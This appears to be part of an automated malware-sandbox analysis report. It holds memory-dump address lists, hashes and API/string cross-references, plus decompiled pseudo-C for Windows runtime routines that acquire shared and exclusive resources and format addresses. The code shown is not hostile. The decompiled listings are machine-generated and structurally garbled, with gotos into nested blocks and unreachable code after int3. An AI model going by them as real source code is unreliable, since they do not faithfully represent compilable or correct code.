0x00000000
0x00a6eb8c
0x00a40c96
0x00000000
0x00000000
0x00a40ca2
0x00a40cac
0x00a40cb4
0x00000000
0x00000000
0x00a40b44
0x00a40b47
0x00a40b49
0x00000000
0x00000000
0x00a40b4f
0x00a40b50
0x00000000
0x00000000
0x00a40b56
0x00a40b62
0x00a40b7c
0x00a40bac
0x00a40a0f
0x00a6eaaa
0x00000000
0x00a6eac4
0x00a6eac4
0x00a40bd0
0x00a40bd0
0x00a40bd4
0x00a40bd9
0x00000000
0x00000000
0x00a40bdb
0x00a40be0
0x00a6eb0e
0x00a40a1a
0x00000000
0x00a40a1a
0x00a6eb1a
0x00a6eb1f
0x00a6eb27
0x00000000
0x00000000
0x00a6eb36
0x00000000
0x00a6eb36
0x00a40bea
0x00000000
0x00000000
0x00a40bf6
0x00a40c00
0x00a40c03
0x00a40c0b
0x00000000
0x00a40c0b
0x00a6eaaa
0x00000000
0x00a40a15
0x00a40bb6
0x00000000
0x00a40bc6
0x00a40bc6
0x00a40bcb
0x00a40c15
0x00000000
0x00000000
0x00a40c1d
0x00a40c20
0x00a40c21
0x00a40c24
0x00a40c24
0x00a40c26
0x00000000
0x00a40c26
0x00a40bcd
0x00000000
0x00a40bcd
0x00a40b89
0x00a40b89
0x00a40b90
0x00000000
0x00000000
0x00a40b96
0x00000000
0x00a40b96
0x00a40a04
0x00a40a04
0x00a40b9a
0x00a40b9a
0x00a40b9b
0x00a40b9f
0x00000000
0x00000000
0x00000000
0x00a40ba5
0x00a40ac7
0x00a40aca
0x00a6eacf
0x00000000
0x00a6eade
0x00a6eade
0x00a6eae3
0x00000000
0x00000000
0x00a6eaf3
0x00a6eaf6
0x00a6eaf7
0x00a6eafe
0x00a6eb01
0x00000000
0x00a6eb01
0x00a6eacf
0x00a40ad0
0x00a40ad4
0x00000000
0x00000000
0x00a40ada
0x00a40ae6
0x00a40c34
0x00000000
0x00a40c47
0x00a40c49
0x00a40c4a
0x00a40c4e
0x00a40c51
0x00a40c54
0x00a40c57
0x00a40c5a
0x00000000
0x00000000
0x00000000
0x00a40c60
0x00a40afb
0x00a40afe
0x00a40b02
0x00a40b05
0x00a40b08
0x00000000
0x00a40b08
0x00a40ae6
0x00a40b44
0x00a409f8
0x00a409f8
0x00a409f9
0x00000000
0x00000000
0x00a6eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00A40BF6
__fassign.LIBCMT ref: 00A40CA2

Strings

:, xrefs: 00A40AC7
:, xrefs: 00A40BA9
., xrefs: 00A40A0C

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: f214b70406de7362b1d73cde1ed0345798e7d126cc59d866e066e62151980aa1
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: EDA1E179D0030ADFCF24DF64C880EBEB7B4EF95305F24856ADA42A7282D7349A41EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A40554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A40554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t144);
									_push(0);
									_t51 = E009FF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00A44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00A8217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00A43915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
												_push(_t138);
												_push(0);
												_t58 = E009FF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00A44FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00A8217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A53F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00A43915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A25384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E009FF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00A43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00A43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00A43915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00A25329(_t110, _t138);
																_t69 = E00A253A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x00a4055a
0x00a4055d
0x00a40563
0x00a40566
0x00a405d8
0x00a405e2
0x00a405e5
0x00000000
0x00a405e7
0x00a405e7
0x00a405ea
0x00a405f3
0x00a405f3
0x00a40568
0x00a40568
0x00a40568
0x00a40569
0x00a40569
0x00a40569
0x00a4056b
0x00000000
0x00000000
0x00a6217f
0x00a62183
0x00a6225b
0x00a6225f
0x00a62189
0x00a6218c
0x00a6218f
0x00a62194
0x00a62199
0x00a6219d
0x00a621a0
0x00a621a2
0x00a621ce
0x00a621ce
0x00a621ce
0x00a621d0
0x00a621d6
0x00a621de
0x00a621e2
0x00a621e8
0x00a621e9
0x00a621ec
0x00a621f1
0x00a621f6
0x00000000
0x00000000
0x00a621f8
0x00a621fb
0x00a62206
0x00a6220b
0x00a6220c
0x00a62217
0x00a62226
0x00a6222b
0x00a6222c
0x00a6222f
0x00a62232
0x00a62235
0x00a62235
0x00a6223a
0x00a6223f
0x00a62241
0x00a62243
0x00a62248
0x00a62248
0x00a6224d
0x00a6224f
0x00a62262
0x00a62263
0x00a62268
0x00a62269
0x00a62269
0x00a62269
0x00a6226d
0x00000000
0x00000000
0x00a62276
0x00a62279
0x00a6227e
0x00a62283
0x00a62287
0x00a6228a
0x00a6228d
0x00a6228f
0x00a622bc
0x00a622bc
0x00a622bc
0x00a622be
0x00a622c4
0x00a622cc
0x00a622d0
0x00a622d6
0x00a622d7
0x00a622da
0x00a622df
0x00a622e4
0x00000000
0x00000000
0x00a622e6
0x00a622e9
0x00a622f4
0x00a622f9
0x00a622fa
0x00a62305
0x00a62314
0x00a62319
0x00a6231a
0x00a6231d
0x00a62320
0x00a62323
0x00a62323
0x00a62328
0x00a6232d
0x00a6232f
0x00a62331
0x00a62336
0x00a62336
0x00a6233b
0x00a6233d
0x00a62350
0x00a62351
0x00a62356
0x00a62359
0x00a62359
0x00a6235b
0x00a6235d
0x00a25367
0x00a2536b
0x00a25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a62363
0x00a62363
0x00a62369
0x00a6236a
0x00a6236c
0x00a62371
0x00a62373
0x00000000
0x00a62379
0x00a62379
0x00a6237a
0x00a6237f
0x00a6237f
0x00a62385
0x00a62386
0x00a62389
0x00a6238e
0x00a62390
0x00a25378
0x00a2537c
0x00a62396
0x00a62396
0x00a62397
0x00a6239c
0x00a623a2
0x00a623a3
0x00a623a6
0x00a623ab
0x00a623ad
0x00000000
0x00a623b3
0x00a623b3
0x00a623b4
0x00a623b9
0x00a623ba
0x00a623ba
0x00a623bc
0x00a623bf
0x00000000
0x00000000
0x00a59153
0x00a59158
0x00a5915a
0x00a5915e
0x00a59160
0x00000000
0x00a59166
0x00a59166
0x00a59171
0x00a59176
0x00a59176
0x00000000
0x00a59160
0x00a623c6
0x00a623ce
0x00a623d7
0x00a623d7
0x00a623ad
0x00a62390
0x00a62373
0x00a6233f
0x00a6233f
0x00000000
0x00a6233f
0x00a62291
0x00a62291
0x00a62293
0x00a62295
0x00a6229a
0x00a622a1
0x00a622a3
0x00a622a7
0x00a622a9
0x00000000
0x00000000
0x00a622ab
0x00a622ad
0x00a622af
0x00000000
0x00000000
0x00000000
0x00a622af
0x00a622b1
0x00a622b4
0x00a622b4
0x00a622b6
0x00a253be
0x00a253be
0x00a253be
0x00a253c0
0x00000000
0x00000000
0x00a253cb
0x00a253ce
0x00a253d0
0x00a253d4
0x00a253d6
0x00000000
0x00a253d8
0x00a253e3
0x00a253ea
0x00a253ea
0x00000000
0x00a253d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a622b6
0x00000000
0x00a6228f
0x00a62349
0x00a6234d
0x00a62251
0x00a62251
0x00000000
0x00a62251
0x00a621a4
0x00a621a4
0x00a621a6
0x00a621a8
0x00a621ac
0x00a621b6
0x00a621b8
0x00a621bc
0x00a621be
0x00000000
0x00000000
0x00a621c0
0x00a621c2
0x00a621c4
0x00000000
0x00000000
0x00000000
0x00a621c4
0x00a621c6
0x00a621c6
0x00a621c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00a621c8
0x00a621a2
0x00000000
0x00a62183
0x00a4057b
0x00a4057d
0x00a40581
0x00a40583
0x00a62178
0x00000000
0x00a40589
0x00a4058f
0x00a4058f
0x00a40583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A62206

Strings

RTL: Re-Waiting, xrefs: 00A6223A, 00A62328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC
RTL: Resource at %p, xrefs: 00A6221D, 00A6230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A6220E

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
Instruction ID: f510b12933ad2fa97dbec47dec43746e63c9951263ebfc88f77ee9bb51981f30
Opcode Fuzzy Hash: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
Instruction Fuzzy Hash: EE513776B046016BEB148B28CC81FA633B9AFD8721F218229FD19DF285DA71EC458790

Uniqueness

Uniqueness Score: -1.00%

Function 00A414C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xae2088; // 0x775b8c0e
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00A37707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A02340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x00a414c0
0x00a414cb
0x00a414d2
0x00a414d6
0x00a414da
0x00a414de
0x00a414e3
0x00a4157a
0x00a4157a
0x00a414f1
0x00a414f3
0x00a6ea0f
0x00000000
0x00a6ea15
0x00000000
0x00a6ea15
0x00a414f9
0x00a414f9
0x00a414fe
0x00a41504
0x00a6ea1a
0x00a6ea1f
0x00a6ea21
0x00a6ea22
0x00a6ea27
0x00a6ea2a
0x00a6ea2a
0x00a41515
0x00a41517
0x00a4156d
0x00a41572
0x00a41575
0x00a41575
0x00a4151e
0x00a6ea50
0x00a6ea55
0x00a6ea58
0x00a6ea58
0x00a4152e
0x00a41531
0x00a41533
0x00000000
0x00a41535
0x00a41541
0x00a41549
0x00a41549
0x00a41533
0x00a414f3
0x00a41559

APIs

___swprintf_l.LIBCMT ref: 00A6EA22

Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A4146B
Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A41490

___swprintf_l.LIBCMT ref: 00A4156D

Strings

]:%u, xrefs: 00A6EA47
%%%u, xrefs: 00A41564

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
Instruction ID: efdad50921c4c877daf2fb7c32043ae97c7b81124c2e442e3c97a1f6eb79cfab
Opcode Fuzzy Hash: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
Instruction Fuzzy Hash: 2721A576900219ABCF20DF54DD45AEFB3BCBB90700F544555FC5AD3141EB70AA988BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A253A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00A253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t92);
									_push(0);
									_t37 = E009FF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00A44FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00A8217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00A43915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A25384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E009FF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00A43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00A43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00A43915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00A25329(_t74, _t92);
													_push(1);
													_t48 = E00A253A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x00a253ab
0x00a253ae
0x00a253b1
0x00a253b4
0x00a253b7
0x00a405b6
0x00a405c0
0x00a405c3
0x00000000
0x00a405c9
0x00a405c9
0x00a405cc
0x00a405d5
0x00a405d5
0x00a253bd
0x00a253bd
0x00a253bd
0x00a253be
0x00a253be
0x00a253be
0x00a253c0
0x00000000
0x00000000
0x00a62269
0x00a6226d
0x00a62349
0x00a6234d
0x00a62273
0x00a62276
0x00a62279
0x00a6227e
0x00a62283
0x00a62287
0x00a6228a
0x00a6228d
0x00a6228f
0x00a622bc
0x00a622bc
0x00a622bc
0x00a622be
0x00a622c4
0x00a622cc
0x00a622d0
0x00a622d6
0x00a622d7
0x00a622da
0x00a622df
0x00a622e4
0x00000000
0x00000000
0x00a622e6
0x00a622e9
0x00a622f4
0x00a622f9
0x00a622fa
0x00a62305
0x00a62314
0x00a62319
0x00a6231a
0x00a6231d
0x00a62320
0x00a62323
0x00a62323
0x00a62328
0x00a6232d
0x00a6232f
0x00a62331
0x00a62336
0x00a62336
0x00a6233b
0x00a6233d
0x00a62350
0x00a62351
0x00a62356
0x00a62359
0x00a62359
0x00a6235b
0x00a6235d
0x00a25367
0x00a2536b
0x00a25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a62363
0x00a62363
0x00a62369
0x00a6236a
0x00a6236c
0x00a62371
0x00a62373
0x00000000
0x00a62379
0x00a62379
0x00a6237a
0x00a6237f
0x00a6237f
0x00a62385
0x00a62386
0x00a62389
0x00a6238e
0x00a62390
0x00a25378
0x00a2537c
0x00a62396
0x00a62396
0x00a62397
0x00a6239c
0x00a623a2
0x00a623a3
0x00a623a6
0x00a623ab
0x00a623ad
0x00000000
0x00a623b3
0x00a623b3
0x00a623b4
0x00a623b9
